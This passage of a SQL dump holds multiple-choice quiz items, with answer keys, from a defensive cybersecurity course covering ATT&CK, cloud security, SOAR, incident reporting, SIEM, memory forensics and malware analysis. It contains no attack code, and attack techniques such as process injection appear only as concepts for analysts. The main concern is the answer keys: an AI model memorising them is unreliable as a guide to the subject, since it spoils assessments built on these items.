(6115, 316, 'ATT&CK stands for:', 1, 'Adversarial Tactics, Techniques, and Common Knowledge', 0, 'Meaning', '2025-12-26 23:09:24', '[\"Attack Technical Team\", \"Adversarial Tactics, Techniques, and Common Knowledge\", \"Automated Threat Testing\", \"None\"]'),
(6116, 316, 'How many Enterprise tactics are there?', 2, '14', 0, 'Count', '2025-12-26 23:09:24', '[\"10\", \"12\", \"14\", \"16\"]'),
(6117, 316, 'Techniques describe:', 3, 'How adversaries achieve goals', 0, 'Method', '2025-12-26 23:09:24', '[\"Why they attack\", \"How adversaries achieve goals\", \"Who attacks\", \"When attacks happen\"]'),
(6118, 316, 'T1059 refers to:', 4, 'Command and Scripting Interpreter', 0, 'Execution', '2025-12-26 23:09:24', '[\"Persistence\", \"Command and Scripting Interpreter\", \"Discovery\", \"Exfiltration\"]'),
(6119, 316, 'Which tool visualizes ATT&CK coverage?', 5, 'Navigator', 0, 'Visualization', '2025-12-26 23:09:24', '[\"Wireshark\", \"Navigator\", \"Nmap\", \"Burp\"]'),
(6120, 316, 'Gap Analysis identifies:', 6, 'Techniques you cannot detect', 0, 'Blind spots', '2025-12-26 23:09:24', '[\"Best techniques\", \"Techniques you cannot detect\", \"Fast techniques\", \"Old techniques\"]'),
(6121, 321, 'In IaaS, who is responsible for patching the OS?', 1, 'The customer', 0, 'You', '2025-12-26 23:10:39', '[\"The provider\", \"The customer\", \"Nobody\", \"Microsoft\"]'),
(6122, 321, 'Which model gives you just the application?', 2, 'SaaS', 0, 'Software', '2025-12-26 23:10:39', '[\"IaaS\", \"PaaS\", \"SaaS\", \"None\"]'),
(6123, 321, 'AWS EC2 is an example of:', 3, 'IaaS', 0, 'Infrastructure', '2025-12-26 23:10:39', '[\"PaaS\", \"SaaS\", \"IaaS\", \"FaaS\"]'),
(6124, 322, 'Who secures the physical data center?', 1, 'The cloud provider', 0, 'Provider', '2025-12-26 23:10:39', '[\"Customer\", \"The cloud provider\", \"Government\", \"Nobody\"]'),
(6125, 322, 'IAM is whose responsibility?', 2, 'The customer (always)', 0, 'You', '2025-12-26 23:10:39', '[\"Provider\", \"The customer (always)\", \"Maybe both\", \"Neither\"]'),
(6126, 322, 'In SaaS, what does the customer manage?', 3, 'Data and user access', 0, 'Limited', '2025-12-26 23:10:39', '[\"Everything\", \"Data and user access\", \"Hardware\", \"Nothing\"]'),
(6127, 323, 'Which AWS service logs API calls?', 1, 'CloudTrail', 0, 'Audit', '2025-12-26 23:10:39', '[\"GuardDuty\", \"CloudTrail\", \"Config\", \"WAF\"]'),
(6128, 323, 'What should be blocked by default on S3 buckets?', 2, 'Public Access', 0, 'Privacy', '2025-12-26 23:10:39', '[\"Private Access\", \"Public Access\", \"All Access\", \"Admin Access\"]'),
(6129, 323, 'What does IAM stand for?', 3, 'Identity and Access Management', 0, 'Identity', '2025-12-26 23:10:39', '[\"Internet Access Manager\", \"Identity and Access Management\", \"Internal Admin Module\", \"Instance Access Mode\"]'),
(6130, 324, 'What is Azure Sentinel?', 1, 'Cloud-native SIEM', 0, 'SIEM', '2025-12-26 23:10:39', '[\"Firewall\", \"Cloud-native SIEM\", \"Antivirus\", \"VPN\"]'),
(6131, 324, 'PIM provides:', 2, 'Just-in-time admin access', 0, 'Temporary', '2025-12-26 23:10:39', '[\"Permanent access\", \"Just-in-time admin access\", \"Public access\", \"No access\"]'),
(6132, 324, 'Which service manages secrets in Azure?', 3, 'Key Vault', 0, 'Secrets', '2025-12-26 23:10:39', '[\"Blob Storage\", \"Key Vault\", \"Azure AD\", \"Sentinel\"]'),
(6133, 325, 'What is the #1 cause of cloud breaches?', 1, 'Misconfigurations', 0, 'Config', '2025-12-26 23:10:39', '[\"Hackers\", \"Misconfigurations\", \"Malware\", \"Phishing\"]'),
(6134, 325, 'What does CSPM stand for?', 2, 'Cloud Security Posture Management', 0, 'Posture', '2025-12-26 23:10:39', '[\"Cloud Security Policy Manager\", \"Cloud Security Posture Management\", \"Cyber Security PM\", \"Cloud System Protection Mode\"]'),
(6135, 325, 'Open Security Groups allowing 0.0.0.0/0 SSH is:', 3, 'A critical misconfiguration', 0, 'Bad', '2025-12-26 23:10:39', '[\"Normal\", \"A critical misconfiguration\", \"Recommended\", \"Fast\"]'),
(6136, 326, 'In IaaS, who patches the operating system?', 1, 'The customer', 0, 'You', '2025-12-26 23:10:39', '[\"Provider\", \"The customer\", \"AWS\", \"Nobody\"]'),
(6137, 326, 'The Shared Responsibility Model divides:', 2, 'Security responsibilities between customer and provider', 0, 'Division', '2025-12-26 23:10:39', '[\"Costs\", \"Security responsibilities between customer and provider\", \"Users\", \"Regions\"]'),
(6138, 326, 'Which AWS service detects threats using ML?', 3, 'GuardDuty', 0, 'ML', '2025-12-26 23:10:39', '[\"CloudTrail\", \"GuardDuty\", \"Config\", \"WAF\"]'),
(6139, 326, 'What is Azure Sentinel?', 4, 'Cloud-native SIEM', 0, 'SIEM', '2025-12-26 23:10:39', '[\"VPN\", \"Firewall\", \"Cloud-native SIEM\", \"Storage\"]'),
(6140, 326, 'Public S3 buckets are:', 5, 'A major security risk', 0, 'Bad', '2025-12-26 23:10:39', '[\"Recommended\", \"A major security risk\", \"Fast\", \"Cheap\"]'),
(6141, 326, 'CSPM helps find:', 6, 'Cloud misconfigurations', 0, 'Errors', '2025-12-26 23:10:39', '[\"Malware\", \"Cloud misconfigurations\", \"Users\", \"Costs\"]'),
(6142, 331, 'What is \"Alert Fatigue\"?', 1, 'Being overwhelmed by too many alerts', 0, 'Tired', '2025-12-26 23:11:57', '[\"Being lazy\", \"Being overwhelmed by too many alerts\", \"Not seeing alerts\", \"Fast response\"]'),
(6143, 331, 'Automation provides what key benefit?', 2, 'Speed and consistency', 0, 'Fast', '2025-12-26 23:11:57', '[\"More alerts\", \"Speed and consistency\", \"More cost\", \"Complexity\"]'),
(6144, 331, 'Which task is ideal for automation?', 3, 'Repetitive enrichment lookups', 0, 'Repetitive', '2025-12-26 23:11:57', '[\"Complex investigations\", \"Repetitive enrichment lookups\", \"Board meetings\", \"Hiring\"]'),
(6145, 332, 'What does SOAR stand for?', 1, 'Security Orchestration, Automation, and Response', 0, 'SOAR', '2025-12-26 23:11:57', '[\"Security Operations and Response\", \"Security Orchestration, Automation, and Response\", \"System Organized Auto Response\", \"None\"]'),
(6146, 332, 'Which is an open-source SOAR platform?', 2, 'TheHive / Shuffle', 0, 'Free', '2025-12-26 23:11:57', '[\"Splunk SOAR\", \"TheHive / Shuffle\", \"Cortex XSOAR\", \"IBM Resilient\"]'),
(6147, 332, 'SOAR connects tools through:', 3, 'API integrations', 0, 'APIs', '2025-12-26 23:11:57', '[\"Email\", \"API integrations\", \"Phone calls\", \"Fax\"]'),
(6148, 333, 'What is the first step in a playbook?', 1, 'Trigger (what starts the workflow)', 0, 'Start', '2025-12-26 23:11:57', '[\"Action\", \"Trigger (what starts the workflow)\", \"Closure\", \"Enrichment\"]'),
(6149, 333, 'Why include \"Human in the Loop\"?', 2, 'For critical actions requiring approval', 0, 'Safety', '2025-12-26 23:11:57', '[\"Slower\", \"For critical actions requiring approval\", \"More errors\", \"Fun\"]'),
(6150, 333, 'What should playbooks always include?', 3, 'Logging and error handling', 0, 'Audit', '2025-12-26 23:11:57', '[\"Music\", \"Logging and error handling\", \"Colors\", \"Animations\"]'),
(6151, 334, 'What action is common for malware alerts?', 1, 'Isolate the host', 0, 'Containment', '2025-12-26 23:11:57', '[\"Delete the host\", \"Isolate the host\", \"Ignore\", \"Promote user\"]'),
(6152, 334, 'Threat Intel automation pushes IOCs to:', 2, 'SIEM and Firewall blocklists', 0, 'Block', '2025-12-26 23:11:57', '[\"Email\", \"SIEM and Firewall blocklists\", \"Phone\", \"Printer\"]'),
(6153, 334, 'For suspected account compromise, what should be automated?', 3, 'Force password reset and revoke sessions', 0, 'Reset', '2025-12-26 23:11:57', '[\"Promote user\", \"Force password reset and revoke sessions\", \"Delete account\", \"Ignore\"]'),
(6154, 335, 'Which Python library is used for HTTP calls?', 1, 'requests', 0, 'HTTP', '2025-12-26 23:11:57', '[\"json\", \"requests\", \"socket\", \"hashlib\"]'),
(6155, 335, 'Why is Python popular for security?', 2, 'Simple syntax and great libraries', 0, 'Easy', '2025-12-26 23:11:57', '[\"It is fast\", \"Simple syntax and great libraries\", \"It is new\", \"It is hard\"]'),
(6156, 335, 'What does hashlib calculate?', 3, 'File hashes (MD5, SHA256)', 0, 'Hash', '2025-12-26 23:11:57', '[\"Passwords\", \"File hashes (MD5, SHA256)\", \"Colors\", \"Sound\"]'),
(6157, 336, 'SOAR stands for:', 1, 'Security Orchestration, Automation, and Response', 0, 'SOAR', '2025-12-26 23:11:57', '[\"Security Operations\", \"Security Orchestration, Automation, and Response\", \"System Order\", \"None\"]'),
(6158, 336, 'What is the main benefit of automation?', 2, 'Speed and consistency', 0, 'Faster', '2025-12-26 23:11:57', '[\"More alerts\", \"Speed and consistency\", \"More cost\", \"Complexity\"]'),
(6159, 336, 'What starts a playbook?', 3, 'A trigger (e.g., SIEM alert)', 0, 'Trigger', '2025-12-26 23:11:57', '[\"A human\", \"A trigger (e.g., SIEM alert)\", \"Random chance\", \"Nothing\"]'),
(6160, 336, 'Which Python library makes HTTP API calls?', 4, 'requests', 0, 'Library', '2025-12-26 23:11:57', '[\"json\", \"requests\", \"socket\", \"os\"]'),
(6161, 336, 'For malware alerts, a common automated action is:', 5, 'Isolate the host', 0, 'Contain', '2025-12-26 23:11:57', '[\"Delete files\", \"Isolate the host\", \"Reboot\", \"Ignore\"]'),
(6162, 336, 'TheHive is an example of:', 6, 'Open-source SOAR', 0, 'Free', '2025-12-26 23:11:57', '[\"Commercial SIEM\", \"Open-source SOAR\", \"Antivirus\", \"Firewall\"]'),
(6163, 341, 'Why is real-time documentation important?', 1, 'You will forget details later', 0, 'Accurate', '2025-12-26 23:13:12', '[\"It is not\", \"You will forget details later\", \"It is slower\", \"For fun\"]'),
(6164, 341, 'Documentation is required for:', 2, 'Legal evidence and audits', 0, 'Compliance', '2025-12-26 23:13:12', '[\"Fun\", \"Legal evidence and audits\", \"Nothing\", \"Vacation\"]'),
(6165, 341, 'What should you avoid in documentation?', 3, 'Vague language like \"some malware\"', 0, 'Be specific', '2025-12-26 23:13:12', '[\"Details\", \"Vague language like \\\"some malware\\\"\", \"Timestamps\", \"Evidence\"]'),
(6166, 342, 'What timezone should timelines use?', 1, 'UTC', 0, 'Standard', '2025-12-26 23:13:12', '[\"Local\", \"UTC\", \"EST\", \"Random\"]'),
(6167, 342, 'What should every timeline entry include?', 2, 'Timestamp, Source, Event, Actor', 0, 'Complete', '2025-12-26 23:13:12', '[\"Just time\", \"Timestamp, Source, Event, Actor\", \"Just event\", \"Nothing\"]'),
(6168, 342, 'Why link to evidence in the timeline?', 3, 'To support claims with proof', 0, 'Verification', '2025-12-26 23:13:12', '[\"Decoration\", \"To support claims with proof\", \"Fun\", \"Color\"]'),
(6169, 343, 'What comes first in an incident report?', 1, 'Executive Summary', 0, 'Top', '2025-12-26 23:13:12', '[\"Appendix\", \"Executive Summary\", \"Technical Findings\", \"Timeline\"]'),
(6170, 343, 'Who is the Executive Summary written for?', 2, 'Leadership (non-technical)', 0, 'C-Suite', '2025-12-26 23:13:12', '[\"Hackers\", \"Leadership (non-technical)\", \"Developers\", \"Interns\"]'),
(6171, 343, 'What should you include in an Appendix?', 3, 'Raw logs, hashes, supporting evidence', 0, 'Details', '2025-12-26 23:13:12', '[\"Summary\", \"Raw logs, hashes, supporting evidence\", \"Executive summary\", \"Nothing\"]'),
(6172, 344, 'What should an Executive Summary avoid?', 1, 'Technical jargon', 0, 'Simple', '2025-12-26 23:13:12', '[\"Details\", \"Technical jargon\", \"Impact\", \"Recommendations\"]'),
(6173, 344, 'How should impact be described?', 2, 'In business terms (money, data, reputation)', 0, 'Quantify', '2025-12-26 23:13:12', '[\"Technically\", \"In business terms (money, data, reputation)\", \"Vaguely\", \"Not at all\"]'),
(6174, 344, 'What question should the summary answer?', 3, 'What happened and are we safe?', 0, 'Status', '2025-12-26 23:13:12', '[\"Who is to blame?\", \"What happened and are we safe?\", \"What is for lunch?\", \"Nothing\"]'),
(6175, 345, 'What does MTTD stand for?', 1, 'Mean Time to Detect', 0, 'Detection', '2025-12-26 23:13:12', '[\"Mean Time to Delete\", \"Mean Time to Detect\", \"Maximum Threat Time\", \"None\"]'),
(6176, 345, 'A high False Positive rate indicates:', 2, 'Poor detection rules', 0, 'Bad rules', '2025-12-26 23:13:12', '[\"Good security\", \"Poor detection rules\", \"Fast response\", \"Nothing\"]'),
(6177, 345, 'Why track metrics over time?', 3, 'To identify trends and improvements', 0, 'Progress', '2025-12-26 23:13:12', '[\"For fun\", \"To identify trends and improvements\", \"To delete data\", \"No reason\"]'),
(6178, 346, 'What timezone should incident timelines use?', 1, 'UTC', 0, 'Standard', '2025-12-26 23:13:12', '[\"Local\", \"UTC\", \"EST\", \"Random\"]'),
(6179, 346, 'Who is the Executive Summary written for?', 2, 'Leadership', 0, 'Audience', '2025-12-26 23:13:12', '[\"Hackers\", \"Leadership\", \"Developers\", \"Public\"]'),
(6180, 346, 'What does MTTR stand for?', 3, 'Mean Time to Respond', 0, 'Response', '2025-12-26 23:13:12', '[\"Mean Time to Read\", \"Mean Time to Respond\", \"Max Threat Time\", \"None\"]'),
(6181, 346, 'What should documentation avoid?', 4, 'Vague language', 0, 'Specific', '2025-12-26 23:13:12', '[\"Details\", \"Vague language\", \"Timestamps\", \"Evidence\"]'),
(6182, 346, 'What makes metrics valuable?', 5, 'Tracking trends over time', 0, 'Progress', '2025-12-26 23:13:12', '[\"One-time snapshots\", \"Tracking trends over time\", \"Colors\", \"Nothing\"]'),
(6183, 346, 'An Appendix should contain:', 6, 'Raw evidence and supporting data', 0, 'Details', '2025-12-26 23:13:12', '[\"Summary\", \"Raw evidence and supporting data\", \"Executive summary\", \"Nothing\"]'),
(6184, 361, 'What is the purpose of a message queue (Kafka) in SIEM?', 1, 'Buffer ingestion spikes and decouple collection from indexing', 0, 'Buffer', '2025-12-27 02:16:31', '[\"Speed up queries\", \"Buffer ingestion spikes and decouple collection from indexing\", \"Store logs long-term\", \"Replace the SIEM\"]'),
(6185, 361, 'In tiered storage, where should the last 7 days of logs reside?', 2, 'Hot tier (SSD)', 0, 'Fast', '2025-12-27 02:16:31', '[\"Cold archive\", \"Hot tier (SSD)\", \"Data lake\", \"Backup tapes\"]'),
(6186, 361, 'What does Search Head Cluster provide in Splunk?', 3, 'High availability and load balancing for searches', 0, 'HA', '2025-12-27 02:16:31', '[\"Faster indexing\", \"High availability and load balancing for searches\", \"Better parsing\", \"Cheaper storage\"]'),
(6187, 362, 'What does ECS stand for?', 1, 'Elastic Common Schema', 0, 'Schema', '2025-12-27 02:16:31', '[\"Event Collection System\", \"Elastic Common Schema\", \"Enterprise Control System\", \"Endpoint Correlation Service\"]'),
(6188, 362, 'Why normalize logs to a common schema?', 2, 'Enable consistent queries across different log sources', 0, 'Consistency', '2025-12-27 02:16:31', '[\"Make logs smaller\", \"Enable consistent queries across different log sources\", \"Hide sensitive data\", \"Comply with regulations\"]'),
(6189, 362, 'What enrichment might you add during parsing?', 3, 'GeoIP, asset info, threat intelligence', 0, 'Context', '2025-12-27 02:16:31', '[\"Compression\", \"GeoIP, asset info, threat intelligence\", \"Encryption\", \"Deletion markers\"]'),
(6190, 363, 'What is \"Multi-Stage Correlation\"?', 1, 'Detecting attack chains across multiple events/logs', 0, 'Chain', '2025-12-27 02:16:31', '[\"Faster queries\", \"Detecting attack chains across multiple events/logs\", \"Storing more data\", \"Compressing logs\"]'),
(6191, 363, 'Why add whitelists to correlation rules?', 2, 'Reduce false positives from known-good sources', 0, 'Tune', '2025-12-27 02:16:31', '[\"Make rules slower\", \"Reduce false positives from known-good sources\", \"Delete logs\", \"Add encryption\"]'),
(6192, 363, 'What is \"Absence Detection\"?', 3, 'Alerting when an expected event does NOT occur', 0, 'Missing', '2025-12-27 02:16:31', '[\"Detecting attackers\", \"Alerting when an expected event does NOT occur\", \"Finding duplicates\", \"Searching faster\"]'),
(6193, 364, 'Why filter early in a query?', 1, 'Reduce data volume before expensive operations', 0, 'Performance', '2025-12-27 02:16:31', '[\"Make results pretty\", \"Reduce data volume before expensive operations\", \"Add more logs\", \"Comply with laws\"]'),
(6194, 364, 'Which wildcard placement is more efficient?', 2, 'Suffix: admin* (not *admin)', 0, 'Suffix', '2025-12-27 02:16:31', '[\"Both equal\", \"Suffix: admin* (not *admin)\", \"Prefix: *admin\", \"Neither\"]'),
(6195, 364, 'What does \"indexed field\" mean?', 3, 'A field the SIEM can search quickly without scanning all data', 0, 'Fast lookup', '2025-12-27 02:16:31', '[\"A calculated field\", \"A field the SIEM can search quickly without scanning all data\", \"A deleted field\", \"A hidden field\"]'),
(6196, 365, 'What is Sigma?', 1, 'Vendor-agnostic detection rule format', 0, 'Universal', '2025-12-27 02:16:31', '[\"A SIEM product\", \"Vendor-agnostic detection rule format\", \"A programming language\", \"A log format\"]'),
(6197, 365, 'Why use version control for detections?', 2, 'Track changes and enable rollback', 0, 'Git', '2025-12-27 02:16:31', '[\"Make detections slower\", \"Track changes and enable rollback\", \"Hide detections\", \"Compress rules\"]'),
(6198, 365, 'What tool executes real attack techniques for testing?', 3, 'Atomic Red Team', 0, 'Test', '2025-12-27 02:16:31', '[\"Sigma\", \"Atomic Red Team\", \"Splunk\", \"Wireshark\"]'),
(6199, 366, 'In a tiered storage model, where are recent logs stored?', 1, 'Hot tier (SSD)', 0, 'Tier', '2025-12-27 02:16:31', '[\"Cold archive\", \"Hot tier (SSD)\", \"Tape\", \"Cloud only\"]'),
(6200, 366, 'What does OCSF stand for?', 2, 'Open Cybersecurity Schema Framework', 0, 'Schema', '2025-12-27 02:16:31', '[\"Open Cyber Security Framework\", \"Open Cybersecurity Schema Framework\", \"Online Cloud Security Format\", \"None\"]'),
(6201, 366, 'Multi-Stage Correlation detects:', 3, 'Attack chains across multiple events', 0, 'Chain', '2025-12-27 02:16:31', '[\"Single events\", \"Attack chains across multiple events\", \"Faster searches\", \"Log compression\"]'),
(6202, 366, 'What is the benefit of filtering early in queries?', 4, 'Reduce data volume for faster execution', 0, 'Speed', '2025-12-27 02:16:31', '[\"More results\", \"Reduce data volume for faster execution\", \"Better colors\", \"More logs\"]'),
(6203, 366, 'Sigma rules compile to:', 5, 'SIEM-specific queries (SPL, KQL, etc.)', 0, 'Output', '2025-12-27 02:16:31', '[\"PDFs\", \"SIEM-specific queries (SPL, KQL, etc.)\", \"Executables\", \"Emails\"]'),
(6204, 366, 'Detection-as-Code enables:', 6, 'Version control and CI/CD for detections', 0, 'DevOps', '2025-12-27 02:16:31', '[\"Faster attacks\", \"Version control and CI/CD for detections\", \"More alerts\", \"Less security\"]'),
(6205, 371, 'Why is memory forensics critical for fileless malware?', 1, 'Fileless malware never touches disk; only exists in RAM', 0, 'Volatile', '2025-12-27 02:18:03', '[\"It is faster\", \"Fileless malware never touches disk; only exists in RAM\", \"Disk is encrypted\", \"Memory is smaller\"]'),
(6206, 371, 'When should you capture memory during an incident?', 2, 'Before shutdown or containment actions', 0, 'Early', '2025-12-27 02:18:03', '[\"After formatting\", \"Before shutdown or containment actions\", \"Next week\", \"Never\"]'),
(6207, 371, 'What happens to RAM when power is removed?', 3, 'Data is lost (volatile memory)', 0, 'Gone', '2025-12-27 02:18:03', '[\"Data is saved\", \"Data is lost (volatile memory)\", \"Data is compressed\", \"Data is encrypted\"]'),
(6208, 372, 'Which tool captures Linux memory?', 1, 'LiME (Linux Memory Extractor)', 0, 'Linux', '2025-12-27 02:18:03', '[\"WinPMEM\", \"LiME (Linux Memory Extractor)\", \"DumpIt\", \"FTK Imager\"]'),
(6209, 372, 'What is hiberfil.sys?', 2, 'Windows hibernation file containing RAM contents', 0, 'Sleep', '2025-12-27 02:18:03', '[\"A log file\", \"Windows hibernation file containing RAM contents\", \"A virus\", \"A backup file\"]'),
(6210, 372, 'Why run acquisition tool from external USB?', 3, 'Avoid writing to evidence disk and altering it', 0, 'Integrity', '2025-12-27 02:18:03', '[\"Faster speed\", \"Avoid writing to evidence disk and altering it\", \"USB is encrypted\", \"No reason\"]'),
(6211, 373, 'Which plugin finds hidden/unlinked processes?', 1, 'psscan', 0, 'Hidden', '2025-12-27 02:18:03', '[\"pslist\", \"psscan\", \"cmdline\", \"dlllist\"]'),
(6212, 373, 'What does malfind detect?', 2, 'Injected code in process memory', 0, 'Injection', '2025-12-27 02:18:03', '[\"Network connections\", \"Injected code in process memory\", \"File hashes\", \"Passwords\"]'),
(6213, 373, 'What is the difference between pslist and psscan?', 3, 'pslist walks linked list; psscan scans all memory for process structs', 0, 'Scan vs Walk', '2025-12-27 02:18:03', '[\"No difference\", \"pslist walks linked list; psscan scans all memory for process structs\", \"psscan is faster\", \"pslist finds hidden processes\"]'),
(6214, 374, 'What is Process Hollowing?', 1, 'Starting a process suspended and replacing its code', 0, 'Replace', '2025-12-27 02:18:03', '[\"Loading a DLL\", \"Starting a process suspended and replacing its code\", \"Killing a process\", \"Debugging\"]'),
(6215, 374, 'What memory protection is suspicious when combined with code?', 2, 'PAGE_EXECUTE_READWRITE', 0, 'RWX', '2025-12-27 02:18:03', '[\"PAGE_READONLY\", \"PAGE_EXECUTE_READWRITE\", \"PAGE_NOACCESS\", \"PAGE_WRITECOPY\"]'),
(6216, 374, 'How do you detect unlinked/hidden processes?', 3, 'Compare pslist (linked) vs psscan (scanned)', 0, 'Compare', '2025-12-27 02:18:03', '[\"Run antivirus\", \"Compare pslist (linked) vs psscan (scanned)\", \"Reboot\", \"Check Task Manager\"]'),
(6217, 375, 'What does DKOM stand for?', 1, 'Direct Kernel Object Manipulation', 0, 'Kernel', '2025-12-27 02:18:03', '[\"Dynamic Kernel Object Mode\", \"Direct Kernel Object Manipulation\", \"Driver Kernel Object Manager\", \"None\"]'),
(6218, 375, 'How does a rootkit hide a process using DKOM?', 2, 'Unlinks the process from the EPROCESS linked list', 0, 'Unlink', '2025-12-27 02:18:03', '[\"Deletes the executable\", \"Unlinks the process from the EPROCESS linked list\", \"Renames the process\", \"Encrypts the process\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(6219, 375, 'Which Volatility plugin detects SSDT hooks?', 3, 'ssdt', 0, 'Hooks', '2025-12-27 02:18:03', '[\"pslist\", \"netscan\", \"ssdt\", \"malfind\"]'),
(6220, 376, 'What type of malware only exists in RAM?', 1, 'Fileless malware', 0, 'Memory-only', '2025-12-27 02:18:03', '[\"Ransomware\", \"Fileless malware\", \"Worm\", \"Trojan\"]'),
(6221, 376, 'Which tool is used for Linux memory acquisition?', 2, 'LiME', 0, 'Linux', '2025-12-27 02:18:03', '[\"WinPMEM\", \"DumpIt\", \"LiME\", \"FTK Imager\"]'),
(6222, 376, 'What does malfind detect?', 3, 'Injected code in process memory', 0, 'Injection', '2025-12-27 02:18:03', '[\"Files\", \"Injected code in process memory\", \"Passwords\", \"Network\"]'),
(6223, 376, 'What is DKOM?', 4, 'Direct Kernel Object Manipulation', 0, 'Rootkit', '2025-12-27 02:18:03', '[\"Dynamic Kernel Mode\", \"Direct Kernel Object Manipulation\", \"Driver Object Manager\", \"None\"]'),
(6224, 376, 'pslist walks the linked list; psscan...', 5, 'Scans all memory for process structures', 0, 'Scan', '2025-12-27 02:18:03', '[\"Is the same\", \"Scans all memory for process structures\", \"Is faster\", \"Only works on Linux\"]'),
(6225, 376, 'What memory protection suggests injected code?', 6, 'PAGE_EXECUTE_READWRITE', 0, 'RWX', '2025-12-27 02:18:03', '[\"PAGE_READONLY\", \"PAGE_EXECUTE_READWRITE\", \"PAGE_GUARD\", \"PAGE_NOACCESS\"]'),
(6226, 381, 'What tool did the NSA release for free?', 1, 'Ghidra', 0, 'Free', '2025-12-27 02:19:34', '[\"IDA Pro\", \"Ghidra\", \"x64dbg\", \"OllyDbg\"]'),
(6227, 381, 'Why extract IOCs from malware?', 2, 'Create signatures and blocklists', 0, 'Detection', '2025-12-27 02:19:34', '[\"For fun\", \"Create signatures and blocklists\", \"Delete the malware\", \"Sell them\"]'),
(6228, 381, 'What is the purpose of a disassembler?', 3, 'Convert machine code to assembly', 0, 'Translate', '2025-12-27 02:19:34', '[\"Run malware\", \"Convert machine code to assembly\", \"Compile code\", \"Debug\"]'),
(6229, 382, 'Which register typically holds return values in x86?', 1, 'EAX', 0, 'Return', '2025-12-27 02:19:34', '[\"EBX\", \"EAX\", \"ECX\", \"ESP\"]'),
(6230, 382, 'What does the CALL instruction do?', 2, 'Calls a function (pushes return address, jumps)', 0, 'Function', '2025-12-27 02:19:34', '[\"Returns\", \"Calls a function (pushes return address, jumps)\", \"Compares\", \"Loops\"]'),
(6231, 382, 'In x64 calling convention, where are the first 4 arguments?', 3, 'Registers (RCX, RDX, R8, R9)', 0, 'Registers', '2025-12-27 02:19:34', '[\"Stack only\", \"Registers (RCX, RDX, R8, R9)\", \"Memory\", \"Nowhere\"]'),
(6232, 383, 'What does \"Xrefs\" show in IDA?', 1, 'Where a function or variable is referenced', 0, 'Cross-reference', '2025-12-27 02:19:34', '[\"Errors\", \"Where a function or variable is referenced\", \"Registry keys\", \"Network calls\"]'),
(6233, 383, 'What does Ghidra\'s decompiler produce?', 2, 'Pseudo-C code from assembly', 0, 'Readable', '2025-12-27 02:19:34', '[\"Executable\", \"Pseudo-C code from assembly\", \"Encrypted code\", \"Packed code\"]'),
(6234, 383, 'Which API is commonly used to inject code into another process?', 3, 'WriteProcessMemory + CreateRemoteThread', 0, 'Injection', '2025-12-27 02:19:34', '[\"CreateFile\", \"WriteProcessMemory + CreateRemoteThread\", \"RegSetValueEx\", \"CryptEncrypt\"]'),
(6235, 384, 'What does F7 do in x64dbg?', 1, 'Step Into (enter function calls)', 0, 'Step', '2025-12-27 02:19:34', '[\"Run\", \"Step Into (enter function calls)\", \"Exit\", \"Breakpoint\"]'),
(6236, 384, 'Why set a breakpoint on VirtualAlloc?', 2, 'Catch memory allocation (often for unpacking)', 0, 'Unpack', '2025-12-27 02:19:34', '[\"It is random\", \"Catch memory allocation (often for unpacking)\", \"Speed up\", \"Delete files\"]'),
(6237, 384, 'What is a common anti-debug API to bypass?', 3, 'IsDebuggerPresent', 0, 'Anti-debug', '2025-12-27 02:19:34', '[\"CreateFile\", \"IsDebuggerPresent\", \"InternetOpen\", \"RegSetValue\"]'),
(6238, 385, 'What is the purpose of a packer?', 1, 'Compress/obfuscate code to evade detection', 0, 'Hide', '2025-12-27 02:19:34', '[\"Speed up malware\", \"Compress/obfuscate code to evade detection\", \"Add features\", \"Make it smaller for email\"]'),
(6239, 385, 'What does API Hashing hide?', 2, 'The names of Windows APIs being called', 0, 'Names', '2025-12-27 02:19:34', '[\"Return values\", \"The names of Windows APIs being called\", \"File paths\", \"Network traffic\"]'),
(6240, 385, 'How do you find the Original Entry Point (OEP)?', 3, 'Set breakpoints on VirtualAlloc, step until unpacked code runs', 0, 'Breakpoint', '2025-12-27 02:19:34', '[\"Run strings\", \"Set breakpoints on VirtualAlloc, step until unpacked code runs\", \"Read documentation\", \"Ask the malware\"]'),
(6241, 386, 'Which tool is NSA\'s free disassembler?', 1, 'Ghidra', 0, 'Free', '2025-12-27 02:19:34', '[\"IDA Pro\", \"Ghidra\", \"x64dbg\", \"OllyDbg\"]'),
(6242, 386, 'Which register holds the return value in x86?', 2, 'EAX', 0, 'Return', '2025-12-27 02:19:34', '[\"EBX\", \"EAX\", \"ECX\", \"EDX\"]'),
(6243, 386, 'What does F7 do in x64dbg?', 3, 'Step Into', 0, 'Debug', '2025-12-27 02:19:34', '[\"Run\", \"Step Into\", \"Step Over\", \"Exit\"]'),
(6244, 386, 'What is the purpose of a packer?', 4, 'Obfuscate and evade detection', 0, 'Hide', '2025-12-27 02:19:34', '[\"Speed up\", \"Obfuscate and evade detection\", \"Add features\", \"Compress for email\"]'),
(6245, 386, 'Which API is used for code injection?', 5, 'WriteProcessMemory', 0, 'Inject', '2025-12-27 02:19:34', '[\"CreateFile\", \"WriteProcessMemory\", \"RegSetValue\", \"CryptEncrypt\"]'),
(6246, 386, 'What does IsDebuggerPresent detect?', 6, 'If the process is being debugged', 0, 'Anti-debug', '2025-12-27 02:19:34', '[\"Malware\", \"If the process is being debugged\", \"Network\", \"Files\"]'),
(6247, 391, 'Who consumes Strategic threat intel?', 1, 'Executives (high-level trends, risk)', 0, 'Leadership', '2025-12-27 02:21:01', '[\"SOC Analysts\", \"Executives (high-level trends, risk)\", \"Developers\", \"Interns\"]'),
(6248, 391, 'What does \"Actionability\" mean for intel?', 2, 'Can we do something with this information?', 0, 'Useful', '2025-12-27 02:21:01', '[\"Is it expensive\", \"Can we do something with this information?\", \"Is it pretty\", \"Is it long\"]'),
(6249, 391, 'Technical intel contains:', 3, 'Hashes, IPs, domains, YARA rules', 0, 'IOCs', '2025-12-27 02:21:01', '[\"Strategy documents\", \"Hashes, IPs, domains, YARA rules\", \"Financial reports\", \"HR data\"]'),
(6250, 392, 'What is MISP?', 1, 'Open-source threat intel sharing platform', 0, 'Platform', '2025-12-27 02:21:01', '[\"A SIEM\", \"Open-source threat intel sharing platform\", \"A firewall\", \"A sandbox\"]'),
(6251, 392, 'What does GreyNoise help distinguish?', 2, 'Background internet noise vs targeted attacks', 0, 'Filter', '2025-12-27 02:21:01', '[\"Good vs bad files\", \"Background internet noise vs targeted attacks\", \"Encrypted vs clear\", \"Fast vs slow\"]'),
